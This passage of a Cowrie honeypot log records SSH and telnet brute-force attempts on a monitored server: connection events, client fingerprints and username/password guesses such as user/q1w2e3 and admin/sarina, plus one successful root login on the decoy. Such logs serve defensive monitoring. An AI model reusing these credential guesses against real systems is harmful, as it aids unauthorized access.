fie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:00:14.579641Z","src_ip":"196.251.86.249","session":"10b51526f6f7"}
{"eventid":"cowrie.login.failed","username":"user","password":"q1w2e3","message":"login attempt [user/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-26T11:00:17.100656Z","src_ip":"196.251.86.249","session":"10b51526f6f7"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:00:18.864478Z","src_ip":"196.251.86.249","session":"10b51526f6f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42354,"dst_ip":"1.2.3.4","dst_port":23,"session":"50c210432c55","protocol":"telnet","message":"New connection: 212.227.125.160:42354 (1.2.3.4:23) [session: 50c210432c55]","sensor":"my-vps","timestamp":"2025-08-26T11:01:00.812784Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":55104,"dst_ip":"1.2.3.4","dst_port":22,"session":"6579c10d8bc5","protocol":"ssh","message":"New connection: 196.251.86.249:55104 (1.2.3.4:22) [session: 6579c10d8bc5]","sensor":"my-vps","timestamp":"2025-08-26T11:01:14.490525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:01:15.166770Z","src_ip":"196.251.86.249","session":"6579c10d8bc5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:01:15.167434Z","src_ip":"196.251.86.249","session":"6579c10d8bc5"}
{"eventid":"cowrie.login.failed","username":"user","password":"q1w2e3r4","message":"login attempt [user/q1w2e3r4] failed","sensor":"my-vps","timestamp":"2025-08-26T11:01:17.032926Z","src_ip":"196.251.86.249","session":"6579c10d8bc5"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:01:18.670187Z","src_ip":"196.251.86.249","session":"6579c10d8bc5"}
{"eventid":"cowrie.session.closed","duration":30.7598397731781,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:01:31.572553Z","src_ip":"212.227.125.160","session":"50c210432c55"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58124,"dst_ip":"1.2.3.4","dst_port":22,"session":"2055e39a6c54","protocol":"ssh","message":"New connection: 217.72.205.35:58124 (1.2.3.4:22) [session: 2055e39a6c54]","sensor":"my-vps","timestamp":"2025-08-26T11:01:47.635584Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:01:47.636786Z","src_ip":"217.72.205.35","session":"2055e39a6c54"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":55622,"dst_ip":"1.2.3.4","dst_port":22,"session":"4af56d7d9924","protocol":"ssh","message":"New connection: 196.251.86.249:55622 (1.2.3.4:22) [session: 4af56d7d9924]","sensor":"my-vps","timestamp":"2025-08-26T11:02:15.353175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:02:15.967603Z","src_ip":"196.251.86.249","session":"4af56d7d9924"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:02:15.977980Z","src_ip":"196.251.86.249","session":"4af56d7d9924"}
{"eventid":"cowrie.login.failed","username":"user","password":"1q2w3e","message":"login attempt [user/1q2w3e] failed","sensor":"my-vps","timestamp":"2025-08-26T11:02:18.334028Z","src_ip":"196.251.86.249","session":"4af56d7d9924"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:02:19.930801Z","src_ip":"196.251.86.249","session":"4af56d7d9924"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34498,"dst_ip":"1.2.3.4","dst_port":23,"session":"60bd6b63141d","protocol":"telnet","message":"New connection: 212.227.235.229:34498 (1.2.3.4:23) [session: 60bd6b63141d]","sensor":"my-vps","timestamp":"2025-08-26T11:02:48.933927Z"}
{"eventid":"cowrie.session.closed","duration":1.797410011291504,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:02:50.731253Z","src_ip":"212.227.235.229","session":"60bd6b63141d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":55846,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b39ebda8a07","protocol":"ssh","message":"New connection: 196.251.86.249:55846 (1.2.3.4:22) [session: 2b39ebda8a07]","sensor":"my-vps","timestamp":"2025-08-26T11:03:17.024815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:03:17.611822Z","src_ip":"196.251.86.249","session":"2b39ebda8a07"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:03:17.612763Z","src_ip":"196.251.86.249","session":"2b39ebda8a07"}
{"eventid":"cowrie.login.failed","username":"user","password":"1q2w3e4r","message":"login attempt [user/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-26T11:03:19.611175Z","src_ip":"196.251.86.249","session":"2b39ebda8a07"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:03:21.155486Z","src_ip":"196.251.86.249","session":"2b39ebda8a07"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":55984,"dst_ip":"1.2.3.4","dst_port":22,"session":"40584d5218fd","protocol":"ssh","message":"New connection: 196.251.86.249:55984 (1.2.3.4:22) [session: 40584d5218fd]","sensor":"my-vps","timestamp":"2025-08-26T11:04:19.009038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:04:19.526331Z","src_ip":"196.251.86.249","session":"40584d5218fd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:04:19.527300Z","src_ip":"196.251.86.249","session":"40584d5218fd"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T11:04:22.089625Z","src_ip":"196.251.86.249","session":"40584d5218fd"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:04:23.498345Z","src_ip":"196.251.86.249","session":"40584d5218fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44615,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1024688f088","protocol":"ssh","message":"New connection: 212.227.235.229:44615 (1.2.3.4:22) [session: b1024688f088]","sensor":"my-vps","timestamp":"2025-08-26T11:04:40.221105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T11:04:40.221732Z","src_ip":"212.227.235.229","session":"b1024688f088"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51782,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bf3caf9eb6a","protocol":"ssh","message":"New connection: 212.227.235.229:51782 (1.2.3.4:22) [session: 2bf3caf9eb6a]","sensor":"my-vps","timestamp":"2025-08-26T11:04:40.284782Z"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T11:04:40.331114Z","src_ip":"212.227.235.229","session":"b1024688f088"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sarina","message":"login attempt [admin/sarina] failed","sensor":"my-vps","timestamp":"2025-08-26T11:04:40.846484Z","src_ip":"212.227.235.229","session":"b1024688f088"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:04:40.897906Z","src_ip":"212.227.235.229","session":"2bf3caf9eb6a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:04:40.898652Z","src_ip":"212.227.235.229","session":"2bf3caf9eb6a"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":41772,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e403dbdbab8","protocol":"ssh","message":"New connection: 93.123.109.189:41772 (1.2.3.4:22) [session: 7e403dbdbab8]","sensor":"my-vps","timestamp":"2025-08-26T11:04:41.740038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:04:41.740718Z","src_ip":"93.123.109.189","session":"7e403dbdbab8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:04:41.761106Z","src_ip":"93.123.109.189","session":"7e403dbdbab8"}
{"eventid":"cowrie.login.failed","username":"node","password":"123456","message":"login attempt [node/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:04:41.820377Z","src_ip":"93.123.109.189","session":"7e403dbdbab8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sanjose","message":"login attempt [admin/sanjose] failed","sensor":"my-vps","timestamp":"2025-08-26T11:04:41.956013Z","src_ip":"212.227.235.229","session":"b1024688f088"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:04:42.841242Z","src_ip":"93.123.109.189","session":"7e403dbdbab8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"samue","message":"login attempt [admin/samue] failed","sensor":"my-vps","timestamp":"2025-08-26T11:04:43.065968Z","src_ip":"212.227.235.229","session":"b1024688f088"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sage","message":"login attempt [admin/sage] failed","sensor":"my-vps","timestamp":"2025-08-26T11:04:44.176275Z","src_ip":"212.227.235.229","session":"b1024688f088"}
{"eventid":"cowrie.login.failed","username":"admin","password":"saddle","message":"login attempt [admin/saddle] failed","sensor":"my-vps","timestamp":"2025-08-26T11:04:45.286749Z","src_ip":"212.227.235.229","session":"b1024688f088"}
{"eventid":"cowrie.login.success","username":"root","password":"11223344","message":"login attempt [root/11223344] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:04:45.433506Z","src_ip":"212.227.235.229","session":"2bf3caf9eb6a"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:04:46.397105Z","src_ip":"212.227.235.229","session":"b1024688f088"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:04:46.681237Z","src_ip":"212.227.235.229","session":"2bf3caf9eb6a"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":56514,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a388f6db5cb","protocol":"ssh","message":"New connection: 196.251.86.249:56514 (1.2.3.4:22) [session: 9a388f6db5cb]","sensor":"my-vps","timestamp":"2025-08-26T11:05:21.128695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:05:21.749139Z","src_ip":"196.251.86.249","session":"9a388f6db5cb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:05:21.749785Z","src_ip":"196.251.86.249","session":"9a388f6db5cb"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwerty123","message":"login attempt [user/qwerty123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:05:23.833183Z","src_ip":"196.251.86.249","session":"9a388f6db5cb"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:05:25.412043Z","src_ip":"196.251.86.249","session":"9a388f6db5cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34578,"dst_ip":"1.2.3.4","dst_port":22,"session":"29bf5cf0e4dc","protocol":"ssh","message":"New connection: 212.227.235.229:34578 (1.2.3.4:22) [session: 29bf5cf0e4dc]","sensor":"my-vps","timestamp":"2025-08-26T11:05:29.181197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:05:29.892979Z","src_ip":"212.227.235.229","session":"29bf5cf0e4dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS